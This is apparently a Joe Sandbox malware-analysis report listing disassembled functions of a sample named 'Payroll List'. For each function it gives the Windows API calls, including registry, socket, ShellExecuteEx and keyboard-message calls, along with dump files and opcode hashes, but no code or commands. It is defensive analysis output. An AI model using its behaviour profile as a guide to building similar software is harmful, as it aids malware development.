                                                                    Function 0016A729 Relevance: 12.3, APIs: 8, Instructions: 317COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0016A806
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: ArraySafeVartype
                                                                    • String ID:
                                                                    • API String ID: 1725837607-0
                                                                    • Opcode ID: b8cb0ca869370131864e090d99fe5d69bf2f7093fb06a7bcb1c0234e87d34f36
                                                                    • Instruction ID: 98c620a37aa7b794922bf4d69d9406f692f0e9e510fddc2857f7e920e7f1f545
                                                                    • Opcode Fuzzy Hash: b8cb0ca869370131864e090d99fe5d69bf2f7093fb06a7bcb1c0234e87d34f36
                                                                    • Instruction Fuzzy Hash: 18C18B75A0421ADFDB04CF98D881BAEB7F4FF19315F20446AE606E7241D734AA91CF91
                                                                    Function 00166B49 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00166B63
                                                                    • LoadStringW.USER32(00000000), ref: 00166B6A
                                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00166B80
                                                                    • LoadStringW.USER32(00000000), ref: 00166B87
                                                                    • _wprintf.LIBCMT ref: 00166BAD
                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00166BCB
                                                                    Strings
                                                                    • %s (%d) : ==> %s: %s %s, xrefs: 00166BA8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: HandleLoadModuleString$Message_wprintf
                                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                                    • API String ID: 3648134473-3128320259
                                                                    • Opcode ID: 60bee8a679bcfec8705d2a9575038ef8ca2cbf8034a2d3db6bd43a109c72e5a3
                                                                    • Instruction ID: 64225580df229682300125e8ec75494aec59fe17a5aa5ce6be4bf5df3dbc13fe
                                                                    • Opcode Fuzzy Hash: 60bee8a679bcfec8705d2a9575038ef8ca2cbf8034a2d3db6bd43a109c72e5a3
                                                                    • Instruction Fuzzy Hash: E90131F6900208BFEB11ABA4AD89EF7776CE709304F0044A5B746E2551EB749EC48F71
                                                                    Function 00182B19 Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00183C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00182BB5,?,?), ref: 00183C1D
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00182BF6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharConnectRegistryUpper
                                                                    • String ID:
                                                                    • API String ID: 2595220575-0
                                                                    • Opcode ID: 8de8e4c69df2d4c3e8af418501ce1f7064f2dd31a21075f1b95426ee0efcb88a
                                                                    • Instruction ID: a672f2634e400f3642dd907109649a685dcad72f9ef137f62dc648f0fa6b5c74
                                                                    • Opcode Fuzzy Hash: 8de8e4c69df2d4c3e8af418501ce1f7064f2dd31a21075f1b95426ee0efcb88a
                                                                    • Instruction Fuzzy Hash: 549167712042019FCB05EF54D891B6EBBE5FFA8310F04885DF996972A2DB34EA55CF82
                                                                    Function 001795BF Relevance: 12.2, APIs: 8, Instructions: 247networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • select.WSOCK32 ref: 00179691
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 0017969E
                                                                    • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 001796C8
                                                                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 001796E9
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 001796F8
                                                                    • htons.WSOCK32(?,?,?,00000000,?), ref: 001797AA
                                                                    • inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,001BDC00), ref: 00179765
                                                                      • Part of subcall function 0015D2FF: _strlen.LIBCMT ref: 0015D309
                                                                    • _strlen.LIBCMT ref: 00179800
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast_strlen$htonsinet_ntoaselect
                                                                    • String ID:
                                                                    • API String ID: 3480843537-0
                                                                    • Opcode ID: fb31b558383e0ed285754760f643c566fdd4d9944b991492bccb1ba7e9ec1af4
                                                                    • Instruction ID: 6ae6f1b963e393e411df28e2a13b30e16959608b481542a431af85ac68385056
                                                                    • Opcode Fuzzy Hash: fb31b558383e0ed285754760f643c566fdd4d9944b991492bccb1ba7e9ec1af4
                                                                    • Instruction Fuzzy Hash: C381CF31504240ABC714EF64EC86E6FB7F9EFA9714F10861DF55A9B291EB30D908CB92
                                                                    Function 0014A979 Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __mtinitlocknum.LIBCMT ref: 0014A991
                                                                      • Part of subcall function 00147D7C: __FF_MSGBANNER.LIBCMT ref: 00147D91
                                                                      • Part of subcall function 00147D7C: __NMSG_WRITE.LIBCMT ref: 00147D98
                                                                      • Part of subcall function 00147D7C: __malloc_crt.LIBCMT ref: 00147DB8
                                                                    • __lock.LIBCMT ref: 0014A9A4
                                                                    • __lock.LIBCMT ref: 0014A9F0
                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,001D6DE0,00000018,00155E7B,?,00000000,00000109), ref: 0014AA0C
                                                                    • EnterCriticalSection.KERNEL32(8000000C,001D6DE0,00000018,00155E7B,?,00000000,00000109), ref: 0014AA29
                                                                    • LeaveCriticalSection.KERNEL32(8000000C), ref: 0014AA39
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                    • String ID:
                                                                    • API String ID: 1422805418-0
                                                                    • Opcode ID: 02dbde4483ad0c94b20aec24117f677f99f6e647b3fec1b962fd15ba46f874cc
                                                                    • Instruction ID: 3265e6188547073aeec1ac95fead8b983f0dbec192059f4243701c628fd7ff35
                                                                    • Opcode Fuzzy Hash: 02dbde4483ad0c94b20aec24117f677f99f6e647b3fec1b962fd15ba46f874cc
                                                                    • Instruction Fuzzy Hash: AB414E719406019BEB14DFA8D98475CB7B0BF15335F628319E425AB5F1D7B49C80CB82
                                                                    Function 00188ECC Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DeleteObject.GDI32(00000000), ref: 00188EE4
                                                                    • GetDC.USER32(00000000), ref: 00188EEC
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00188EF7
                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00188F03
                                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00188F3F
                                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00188F50
                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0018BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00188F8A
                                                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00188FAA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                    • String ID:
                                                                    • API String ID: 3864802216-0
                                                                    • Opcode ID: 7eb7876bea28b0bb8a2465babbb40ba87dce5a9663bc269cfed8ec6d270f0212
                                                                    • Instruction ID: 6c734c1955e3289e71c26eeb38cd41aa57b9b97a4f9601130553cbcbb8341f73
                                                                    • Opcode Fuzzy Hash: 7eb7876bea28b0bb8a2465babbb40ba87dce5a9663bc269cfed8ec6d270f0212
                                                                    • Instruction Fuzzy Hash: D4316B72200614BFEB109F60DC4AFEA3BA9EF4A715F044065FE099A591DBB59881CB70
                                                                    Function 001716DA Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 309COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0012936C: __swprintf.LIBCMT ref: 001293AB
                                                                      • Part of subcall function 0012936C: __itow.LIBCMT ref: 001293DF
                                                                      • Part of subcall function 0013C6F4: _wcscpy.LIBCMT ref: 0013C717
                                                                    • _wcstok.LIBCMT ref: 0017184E
                                                                    • _wcscpy.LIBCMT ref: 001718DD
                                                                    • _memset.LIBCMT ref: 00171910
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                    • String ID: X
                                                                    • API String ID: 774024439-3081909835
                                                                    • Opcode ID: 767c7a186afc4c868ae2fdead32e3bc690613b750918bb37fd8c73507c332390
                                                                    • Instruction ID: e28f1275d573425738b930dfbb02e76dd75dfcf755fc9d7cc438746cc71fdcc6
                                                                    • Opcode Fuzzy Hash: 767c7a186afc4c868ae2fdead32e3bc690613b750918bb37fd8c73507c332390
                                                                    • Instruction Fuzzy Hash: 23C19F316043509FC724EF28D891A6EB7F0BFA5350F00896DF999972A2DB30ED15CB82
                                                                    Function 00190133 Relevance: 10.7, APIs: 7, Instructions: 245windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0013B34E: GetWindowLongW.USER32(?,000000EB), ref: 0013B35F
                                                                    • GetSystemMetrics.USER32(0000000F), ref: 0019016D
                                                                    • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 0019038D
                                                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 001903AB
                                                                    • InvalidateRect.USER32(?,00000000,00000001,?), ref: 001903D6
                                                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 001903FF
                                                                    • ShowWindow.USER32(00000003,00000000), ref: 00190421
                                                                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 00190440
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                                                    • String ID:
                                                                    • API String ID: 3356174886-0
                                                                    • Opcode ID: a12c09091d52069bce54be07237b75c7e0e41754b18e290ca8edb4f63543713d
                                                                    • Instruction ID: 0559829bfa12d634f4e379eec8abaa666727c730809bd8f9379970953b6bab25
                                                                    • Opcode Fuzzy Hash: a12c09091d52069bce54be07237b75c7e0e41754b18e290ca8edb4f63543713d
                                                                    • Instruction Fuzzy Hash: 36A1AE35600A16EFDF19CF68C9897BDBBB1BF08740F058119EC59AB294D774AE90CB90
                                                                    Function 0013AE78 Relevance: 10.7, APIs: 7, Instructions: 218COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6af716be60ef7ea587a97ac6aba6984848d33cba4506f2c991ddb9faec01641a
                                                                    • Instruction ID: 2b1e88696835c8f21af882b09c1ebb1db24e485a357544301e736127ddf06364
                                                                    • Opcode Fuzzy Hash: 6af716be60ef7ea587a97ac6aba6984848d33cba4506f2c991ddb9faec01641a
                                                                    • Instruction Fuzzy Hash: 92718BB0900109EFDF08CF98CC88AAEBB78FF85310F248149F955AB250C730AA41CFA1
                                                                    Function 00182230 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 0018225A
                                                                    • _memset.LIBCMT ref: 00182323
                                                                    • ShellExecuteExW.SHELL32(?), ref: 00182368
                                                                      • Part of subcall function 0012936C: __swprintf.LIBCMT ref: 001293AB
                                                                      • Part of subcall function 0012936C: __itow.LIBCMT ref: 001293DF
                                                                      • Part of subcall function 0013C6F4: _wcscpy.LIBCMT ref: 0013C717
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0018242F
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 0018243E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                    • String ID: @
                                                                    • API String ID: 4082843840-2766056989
                                                                    • Opcode ID: 4cc1298df7270b41cf5f7f62fda56a104ce0d3b9f1a77f6f34b3660a01eb901c
                                                                    • Instruction ID: 6b0b030abd04128653a4538be094b3ce5890d21a61715e38291e46eca942ff30
                                                                    • Opcode Fuzzy Hash: 4cc1298df7270b41cf5f7f62fda56a104ce0d3b9f1a77f6f34b3660a01eb901c
                                                                    • Instruction Fuzzy Hash: 6C715D74A006299FCF05EFA8D8959AEB7F5FF58310F108459E85AAB351CB34AE40CF94
                                                                    Function 00163DA8 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetParent.USER32(?), ref: 00163DE7
                                                                    • GetKeyboardState.USER32(?), ref: 00163DFC
                                                                    • SetKeyboardState.USER32(?), ref: 00163E5D
                                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 00163E8B
                                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 00163EAA
                                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 00163EF0
                                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00163F13
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                    • String ID:
                                                                    • API String ID: 87235514-0
                                                                    • Opcode ID: 73be3f43bdee3ba9f781903dd21d5c6b2fad9c0c6a0b4f117d0a258c116c042a
                                                                    • Instruction ID: c75b47602684583586026c5ceabc024638e13107355db78befdc39e1958cd449
                                                                    • Opcode Fuzzy Hash: 73be3f43bdee3ba9f781903dd21d5c6b2fad9c0c6a0b4f117d0a258c116c042a
                                                                    • Instruction Fuzzy Hash: C051B3A0A047D53DFB364738CC49BBA7EA95B06304F088589F0E5468C3D3A9AEE4D761
                                                                    Function 00163BC3 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetParent.USER32(00000000), ref: 00163C02
                                                                    • GetKeyboardState.USER32(?), ref: 00163C17
                                                                    • SetKeyboardState.USER32(?), ref: 00163C78
                                                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00163CA4
                                                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00163CC1
                                                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00163D05
                                                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00163D26
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                    • String ID:
                                                                    • API String ID: 87235514-0
                                                                    • Opcode ID: 98a33423247c33d7e0dae943eba5f67eb00f71f5c685172f5c269f0ff7c8fd52
                                                                    • Instruction ID: 3279a3c9416a870963cb684933b3e17ade5134c38354500e36b259cdd40743e5
                                                                    • Opcode Fuzzy Hash: 98a33423247c33d7e0dae943eba5f67eb00f71f5c685172f5c269f0ff7c8fd52
                                                                    • Instruction Fuzzy Hash: 975106A09047D53DFB3687748C45BB6BFA9AB06300F0C8489F1E55A8C3D795EEA4E760
                                                                    Function 00167DB1 Relevance: 10.6, APIs: 7, Instructions: 137timeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsncpy$LocalTime
                                                                    • String ID:
                                                                    • API String ID: 2945705084-0
                                                                    • Opcode ID: 32ce8043946a9216310c4b2039204859129d2e2b9d917941dcbf47510051fa70
                                                                    • Instruction ID: 97f85f5633e0f418cb38079939aa0f725d0ec294513606d4c395e09f55d0edb4
                                                                    • Opcode Fuzzy Hash: 32ce8043946a9216310c4b2039204859129d2e2b9d917941dcbf47510051fa70
                                                                    • Instruction Fuzzy Hash: 6541AC66C10214B6CB11EBF4CC8A9CFB3ACAF58310F5189A6E518E3161FB74E66487A5
                                                                    Function 00183D72 Relevance: 10.6, APIs: 7, Instructions: 100registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00183DA1
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00183DCB
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00183E80
                                                                      • Part of subcall function 00183D72: RegCloseKey.ADVAPI32(?), ref: 00183DE8
                                                                      • Part of subcall function 00183D72: FreeLibrary.KERNEL32(?), ref: 00183E3A
                                                                      • Part of subcall function 00183D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00183E5D
                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00183E25
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                    • String ID:
                                                                    • API String ID: 395352322-0
                                                                    • Opcode ID: a172f3bda4d91b0e647c6930697863337ecfc5de825e57e38721f5b600c7761c
                                                                    • Instruction ID: b6512993a234491bf1bc93b1a2bd52b1582cd76170d20c4d7194697dfbebe671
                                                                    • Opcode Fuzzy Hash: a172f3bda4d91b0e647c6930697863337ecfc5de825e57e38721f5b600c7761c
                                                                    • Instruction Fuzzy Hash: 7C31D9B1901209BFDB15AF94DC85AFFB7BCEB09700F04016AF522A2550D7749F899FA0
                                                                    Function 00188FC8 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00188FE7
                                                                    • GetWindowLongW.USER32(00D2DA20,000000F0), ref: 0018901A
                                                                    • GetWindowLongW.USER32(00D2DA20,000000F0), ref: 0018904F
                                                                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00189081
                                                                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 001890AB
                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 001890BC
                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 001890D6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
